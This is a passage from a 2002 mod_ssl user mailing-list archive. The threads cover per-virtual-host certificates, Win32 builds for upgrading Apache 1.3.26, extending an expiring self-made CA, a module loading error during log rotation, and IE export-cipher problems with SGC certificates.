X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try adding the following directive to your  definition:

	SSLCertificateFile /path/to/file
	SSLCertificateKeyFile /path/to/file

Also make sure that the above directives are not configured for the main server. That's it.

Brian Vaughan



-----Original Message-----
From: Kirchner Stefan [mailto:Stefan.Kirchner@wuerth-it.com]
Sent: Friday, June 21, 2002 10:34 AM
To: 'modssl-users@modssl.org'
Subject: Two certificates in apache and mod_ssl


Hello,

I defined two virtual hosts in apache + mod_ssl with two different server
certificates.
I tried to access the https connection and I got for both virtual hosts the
certificate of the first virtual host.

How do I have to configure it to get the right certificate of each virtual
host.

Or is it not possible? Or how?

Stefan
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 18:15:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00984; Fri, 21 Jun 2002 18:14:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph3.grc.nasa.gov id SAA00941; Fri, 21 Jun 2002 18:14:04 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph3.grc.nasa.gov (Postfix) with ESMTP id 71AC56419A
	for ; Fri, 21 Jun 2002 12:13:58 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g5LGDvra010695
	for ; Fri, 21 Jun 2002 12:13:58 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id MAA31812; Fri, 21 Jun 2002 12:13:57 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Two certificates in apache and mod_ssl
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
	
References: 
	
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.6.99 
Date: 21 Jun 2002 12:13:57 -0400
Message-Id: <1024676037.1515.1954.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Are you using IP Based virtual hosting?  I don't think you can have
multiple certificates on a since IP on the same port.

On Fri, 2002-06-21 at 10:34, Kirchner Stefan wrote:
> Hello,
> 
> I defined two virtual hosts in apache + mod_ssl with two different server
> certificates.
> I tried to access the https connection and I got for both virtual hosts the
> certificate of the first virtual host.
> 
> How do I have to configure it to get the right certificate of each virtual
> host.
> 
> Or is it not possible? Or how?
> 
> Stefan
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 18:26:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA03047; Fri, 21 Jun 2002 18:25:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA02993; Fri, 21 Jun 2002 18:24:23 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A9FED4CE77E; Fri, 21 Jun 2002 18:24:22 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 12A112884A; Fri, 21 Jun 2002 18:21:09 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id SAA00043; Fri, 21 Jun 2002 18:05:49 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=trivadis.com)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17LQm1-0000UK-00; Fri, 21 Jun 2002 17:56:33 +0200
Date: Fri, 21 Jun 2002 17:56:32 +0200
From: Tim Tassonis 
To: modssl-users@modssl.org
Cc: jimlee2@hotmail.com
Subject: Re: Apache 1.3.26 Upgrade Question - Thanks
In-Reply-To: 
References: 
X-Mailer: Sylpheed version 0.7.7 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry Jim

You'd have to wait for Monday. I haven't installed perl anymore and the
build script require that unfortunatley. First got to install perl on
monday in my W2K VMWare.


Bye
Tim

On Thu, 20 Jun 2002 20:12:00 +0000
"Jim Lee"  wrote:

> 
> Thanks a lot Tim.
> 
> Words cannot express the sense of relief and gratitude that i am feeling
> 
> right now.
> 
> I would be eagerly looking tomorrow for the file :
> Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip
> at the following location :
> http://www.modssl.org/contrib/
> 
> Thanks a million again.
> 
> Bye,
> -Jim.
> 
> 
> Hi Jim
> 
> On Thu, 20 Jun 2002 17:48:38 +0000
> "Jim Lee"  wrote:
> 
> Hi,
> 
> Please forgive my ignorance.
> 
> I wish to create a file similar to the following one:
> Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,
> 
> namely,
> Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,
> 
> I need this file so that i can upgrade my current Apache 1.3.20 server
> with mod_ssl to Apache 1.3.26 server with mod_ssl.
> 
> I do not have a VC++ 5.0 compiler on my desk and have no idea how i
> could get the above file from the apache_1.3.26.tar.gz and the
> mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.
> 
> I've got a VC++ 6.0 compiler at my desk and have already compiled the
> stuff myself before on W32. I will do this tomorrow, however I will use
> openssl 0.9.6d ....
> 
> I'll try to put it in the contrib area.
> 
> Bye
> Tim
> 
> 
> 
> Any help from my friends would be highly appreciated.
> 
> Thanks.
> 
> Bye,
> -Jim.
> 
> 
> 
> From: "Gilles Gros" 
> 
> What is really your question ?
> 
> Just download the source and compile it.
> 
> apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
> mod SSL 2.8.9-1.3.26 :
> http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz
> 
> Gilles
> 
> Hi,
> 
> Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
> from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
> recently.
> 
> Thanks.
> 
> Bye,
> -Jim.
> 
> 
> On Wed, 19 Jun 2002, Jim Lee wrote:
> 
> We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
> the http://www.modssl.org/contrib/ area.
> 
> Nobody's contributed one yet.  I imagine it won't be that far off, it
> usually doesn't take too long.
> 
> We also wish to know if the SSL certificate has to be re-created after
> Apache is upgraded to 1.3.26 with the new mod_SSL.
> 
> No.
> 
> --Cliff
> 
> _________________________________________________________________
> Get your FREE download of MSN Explorer at
> http://explorer.msn.com/intl.asp.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 19:34:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA07386; Fri, 21 Jun 2002 19:33:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hackberry.abnamro.com id TAA07347; Fri, 21 Jun 2002 19:32:46 +0200 (MET DST)
From: ilya.birman@abnamro.com
Received: from boxwood.lasalle.na.abnamro.com (boxwood [10.216.0.25])
	by hackberry.abnamro.com (ESMTP) with ESMTP id g5LHRV118737
	for ; Fri, 21 Jun 2002 12:27:31 -0500 (CDT)
Received: from aachir001.lasalle.na.abnamro.com (aachir001.lasalle.na.abnamro.com [10.211.10.118])
	by boxwood.lasalle.na.abnamro.com (ESMTP) with ESMTP id g5LHVW502680
	for ; Fri, 21 Jun 2002 12:31:32 -0500 (CDT)
Subject: How do I extend the expiration day of the self generated CA certificate and
 all the certs issued by that CA. Please help
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.1a (Intl) 17 August 1999
Message-ID: 
Date: Fri, 21 Jun 2002 12:32:20 -0500
X-MIMETrack: Serialize by Router on AACHIR001/HUB/ABNAMRO/NL(Release 5.0.8 |June 18, 2001) at
 06/21/2002 12:32:40 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ilya.birman@abnamro.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have created our own CA certificate and signed few more certs using it.
The CA is about to expire and with that all the certificates signed using
it. Is there a way to extend the expiration day with out recreating the CA
and reissuing the certs?
Please help
Thanks in advance.
Ilya
---------------------------------------------------------------------------
This  message  (including  any  attachments)  is  confidential  and  may be
privileged.  If you have received it by mistake please notify the sender by
return  e-mail  and  delete this message from your system. Any unauthorized
use  or  dissemination  of  this  message  in  whole or in part is strictly
prohibited.  Please  note  that e-mails are susceptible to change. ABN AMRO
Bank  N.V.  (including  its  group  companies)  shall not be liable for the
improper  or  incomplete  transmission of the information contained in this
communication  nor  for  any delay in its receipt or damage to your system.
ABN  AMRO  Bank  N.V.  (or its group companies) does not guarantee that the
integrity   of  this  communication  has  been  maintained  nor  that  this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 21:02:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12910; Fri, 21 Jun 2002 21:01:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.mm.org id VAA12878; Fri, 21 Jun 2002 21:00:53 +0200 (MET DST)
Received: from lycos-inc.com (styx.frontnet.mm.org [209.202.198.220])
	by mail.mm.org  with ESMTP id g5LJ0gB27272
	for ; Fri, 21 Jun 2002 15:00:42 -0400
Message-ID: <3D1377D8.E32C474@lycos-inc.com>
Date: Fri, 21 Jun 2002 15:00:40 -0400
From: Karl Grindley 
Organization: Terra Lycos
X-Mailer: Mozilla 4.77 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache + Modssl mod_log_config.so bug
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Karl Grindley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


after upgrading to Apache 1.3.26 and ModSSL 2.8.9, the webserver seems
to die after/during log rotation with the following errors.  It appears
that when the logs either don't exists, or some other scenario, the
webserver dies after receiving a -HUP or -SIGUSR1.

[Sat Jun 22 04:00:16 2002] [notice] SIGUSR1 received.  Doing graceful
restart
Syntax error on line 62 of /var/www/conf/httpd.conf:
Cannot load /var/www/modules/mod_log_config.so into server:
/var/www/modules/mod_log_config.so: undefined symbol: ap_escape_logitem

Anyone else experiencing this?  seems to even happen with standard
RedHat apache version 1.3.22 also.

Thanks,
Karl

-- 

Karl Grindley
Senior Systems Analyst
Terra Lycos, Inc.

---------------------------------( Disclaimer )----------
This message is intended exclusively for its addressee 
and may contain information that is CONFIDENTIAL. If this 
message has been received in error, please immediately 
notify us via e-mail and delete it.  Please note that 
Internet e-mail does not guarantee the confidentiality 
or the proper receipt of the messages sent.  If the 
addressee of this message does not consent to the use of 
Internet e-mail, please communicate it to us immediately.
----------( Disclaimer )---------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 21:03:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12958; Fri, 21 Jun 2002 21:02:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id VAA12928; Fri, 21 Jun 2002 21:01:48 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 21 Jun 2002 12:00:42 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Fri, 21 Jun 2002 19:00:42 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question - Thanks
Date: Fri, 21 Jun 2002 19:00:42 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 21 Jun 2002 19:00:42.0408 (UTC) FILETIME=[F0E26A80:01C21955]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

If i upgrade our current Apache 1.3.20 server with mod_ssl built using:

Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip

to Apache 1.3.26 server with mod_ssl built using the following file:

Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip,

would i have to re-create my SSL certificate.

My question is in light of the fact that the OpenSSL versions is different 
in each of these files.

Any feedback on the stability of the new file would be very helpful.

Thanks in advance.

Bye,
-Jim.


Sorry Jim

You'd have to wait for Monday. I haven't installed perl anymore and the
build script require that unfortunatley. First got to install perl on
monday in my W2K VMWare.


Bye
Tim

On Thu, 20 Jun 2002 20:12:00 +0000
"Jim Lee"  wrote:


Thanks a lot Tim.

Words cannot express the sense of relief and gratitude that i am feeling

right now.

I would be eagerly looking tomorrow for the file :
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip
at the following location :
http://www.modssl.org/contrib/

Thanks a million again.

Bye,
-Jim.


Hi Jim

On Thu, 20 Jun 2002 17:48:38 +0000
"Jim Lee"  wrote:

Hi,

Please forgive my ignorance.

I wish to create a file similar to the following one:
Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,

namely,
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,

I need this file so that i can upgrade my current Apache 1.3.20 server
with mod_ssl to Apache 1.3.26 server with mod_ssl.

I do not have a VC++ 5.0 compiler on my desk and have no idea how i
could get the above file from the apache_1.3.26.tar.gz and the
mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.

I've got a VC++ 6.0 compiler at my desk and have already compiled the
stuff myself before on W32. I will do this tomorrow, however I will use
openssl 0.9.6d ....

I'll try to put it in the contrib area.

Bye
Tim



Any help from my friends would be highly appreciated.

Thanks.

Bye,
-Jim.



From: "Gilles Gros" 

What is really your question ?

Just download the source and compile it.

apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
mod SSL 2.8.9-1.3.26 :
http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

Gilles

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
recently.

Thanks.

Bye,
-Jim.


On Wed, 19 Jun 2002, Jim Lee wrote:

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
the http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

We also wish to know if the SSL certificate has to be re-created after
Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff



_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 21:12:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA13543; Fri, 21 Jun 2002 21:11:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA13502; Fri, 21 Jun 2002 21:10:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9F7794CE795; Fri, 21 Jun 2002 21:10:30 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0424228680; Fri, 21 Jun 2002 19:04:58 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id SAA03922; Fri, 21 Jun 2002 18:41:33 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g5LGfWh13602846
	for modssl-users@modssl.org; Fri, 21 Jun 2002 18:41:32 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0nwvH; Fri Jun 21 18:41:23 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id SAA12188
	for ; Fri, 21 Jun 2002 18:40:29 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id SAA03801
	for modssl-users@modssl.org; Fri, 21 Jun 2002 18:41:22 +0200 (METDST)
Date: Fri, 21 Jun 2002 18:41:22 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: 56-bit/128-bit IE problems
Message-ID: <20020621184121.A1035846@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20020621152451.79FC.LOUIS@webtedium.com> <00c301c21939$c5e8e500$5a2b7ad8@expertrade.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00c301c21939$c5e8e500$5a2b7ad8@expertrade.com>; from dwall@Yozons.com on Fri, Jun 21, 2002 at 08:39:04AM -0700
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Fri, Jun 21, 2002 at 08:39:04AM -0700, David Wall wrote:
> You could also consider getting a Thawte "super cert" which has
> a capability to allow the 56-bit export version of IE to not be
> so stupid and connect at the higher 128-bit when accessing your
> site.

Just for the record, Thawte's "Super Certs" are what VeriSign
calls "Secure Site Server Pro (Global) ID". But they are quite a
lot cheaper.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 21:30:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15050; Fri, 21 Jun 2002 21:29:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id VAA15033; Fri, 21 Jun 2002 21:29:02 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA28731
	for ; Fri, 21 Jun 2002 15:29:53 -0400
Date: Fri, 21 Jun 2002 15:29:53 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: 56-bit/128-bit IE problems
In-Reply-To: <20020621184121.A1035846@ohm.arago.de>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Are there still export restriction on the 128bit browsers?  I was under
the impression those export restrictions had been lifted a few years back.

Thanks,

Ron DuFresne

On Fri, 21 Jun 2002, Thomas Binder wrote:

> Hi!
> 
> On Fri, Jun 21, 2002 at 08:39:04AM -0700, David Wall wrote:
> > You could also consider getting a Thawte "super cert" which has
> > a capability to allow the 56-bit export version of IE to not be
> > so stupid and connect at the higher 128-bit when accessing your
> > site.
> 
> Just for the record, Thawte's "Super Certs" are what VeriSign
> calls "Secure Site Server Pro (Global) ID". But they are quite a
> lot cheaper.
> 
> 
> Ciao
> 
> Thomas
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 21:35:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15498; Fri, 21 Jun 2002 21:34:54 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id VAA15406; Fri, 21 Jun 2002 21:33:18 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GY2MBF00.E1B for ; Fri, 21 Jun 2002
          20:33:15 +0100 
Message-ID: <3D137F71.7070301@itaction.co.uk>
Date: Fri, 21 Jun 2002 20:33:05 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 56-bit/128-bit IE problems
References: <20020621152451.79FC.LOUIS@webtedium.com> <00c301c21939$c5e8e500$5a2b7ad8@expertrade.com> <20020621184121.A1035846@ohm.arago.de>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The problem here as usual is that he HAS got a SGC certificate - and 
some ie's barf unless you drop EXPORT56 from your offering when you have 
one of those certs.

not worth the money as far as I'm concerned, not even when getting 
thawte's one. I feel its a scam the way they sell SGC's as some sort of 
premium security prouct when all they're doing is enabling functionality 
the browser already has. These were designed for another purpose 
altogether before the USA relaxed its crypto export rules a few years ago.

Thomas Binder wrote:

>Hi!
>
>On Fri, Jun 21, 2002 at 08:39:04AM -0700, David Wall wrote:
>  
>
>>You could also consider getting a Thawte "super cert" which has
>>a capability to allow the 56-bit export version of IE to not be
>>so stupid and connect at the higher 128-bit when accessing your
>>site.
>>    
>>
>
>Just for the record, Thawte's "Super Certs" are what VeriSign
>calls "Secure Site Server Pro (Global) ID". But they are quite a
>lot cheaper.
>
>
>Ciao
>
>Thomas
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 22:19:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA17781; Fri, 21 Jun 2002 22:18:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA17749; Fri, 21 Jun 2002 22:18:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 26FCE4CE794; Fri, 21 Jun 2002 22:18:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 59B012883B; Fri, 21 Jun 2002 22:04:53 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from asgaard.wan.cwomnes.net id VAA16452; Fri, 21 Jun 2002 21:52:46 +0200 (MET DST)
Received: from SROMERO1-SNS.smc.sns.slb.com (plan9.wan.omnes.net [192.23.85.25])
	by asgaard.wan.cwomnes.net (8.10.2+Sun/8.10.2) with ESMTP id g5LJotd17781
	for ; Fri, 21 Jun 2002 14:50:55 -0500 (CDT)
Message-Id: <5.1.1.1.2.20020621144902.0573b770@asgaard.wan.cwomnes.net>
X-Sender: sromero@asgaard.wan.cwomnes.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Fri, 21 Jun 2002 14:50:48 -0500
To: modssl-users@modssl.org
From: Steve Romero 
Subject: Re: Apache 1.3.26 Upgrade Question - Thanks
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Romero 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jim,

It would probably be a good idea to back up your old certificate before 
upgrading.  The certificate is bound to the name of your server or the URL 
of your website, and not the version of Apache that is running, so you can 
reuse it.  At least this is true with UNIX.  I'm not a Windows man myself.

Regards,
Steve Romero

At 07:00 PM 6/21/2002 +0000, you wrote:

>Hi,
>
>If i upgrade our current Apache 1.3.20 server with mod_ssl built using:
>
>Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip
>
>to Apache 1.3.26 server with mod_ssl built using the following file:
>
>Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip,
>
>would i have to re-create my SSL certificate.
>
>My question is in light of the fact that the OpenSSL versions is different 
>in each of these files.
>
>Any feedback on the stability of the new file would be very helpful.
>
>Thanks in advance.
>
>Bye,
>-Jim.
>
>
>Sorry Jim
>
>You'd have to wait for Monday. I haven't installed perl anymore and the
>build script require that unfortunatley. First got to install perl on
>monday in my W2K VMWare.
>
>
>Bye
>Tim
>
>On Thu, 20 Jun 2002 20:12:00 +0000
>"Jim Lee"  wrote:
>
>
>Thanks a lot Tim.
>
>Words cannot express the sense of relief and gratitude that i am feeling
>
>right now.
>
>I would be eagerly looking tomorrow for the file :
>Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip
>at the following location :
>http://www.modssl.org/contrib/
>
>Thanks a million again.
>
>Bye,
>-Jim.
>
>
>Hi Jim
>
>On Thu, 20 Jun 2002 17:48:38 +0000
>"Jim Lee"  wrote:
>
>Hi,
>
>Please forgive my ignorance.
>
>I wish to create a file similar to the following one:
>Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,
>
>namely,
>Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,
>
>I need this file so that i can upgrade my current Apache 1.3.20 server
>with mod_ssl to Apache 1.3.26 server with mod_ssl.
>
>I do not have a VC++ 5.0 compiler on my desk and have no idea how i
>could get the above file from the apache_1.3.26.tar.gz and the
>mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.
>
>I've got a VC++ 6.0 compiler at my desk and have already compiled the
>stuff myself before on W32. I will do this tomorrow, however I will use
>openssl 0.9.6d ....
>
>I'll try to put it in the contrib area.
>
>Bye
>Tim
>
>
>
>Any help from my friends would be highly appreciated.
>
>Thanks.
>
>Bye,
>-Jim.
>
>
>
>From: "Gilles Gros" 
>
>What is really your question ?
>
>Just download the source and compile it.
>
>apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
>mod SSL 2.8.9-1.3.26 :
>http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz
>
>Gilles
>
>Hi,
>
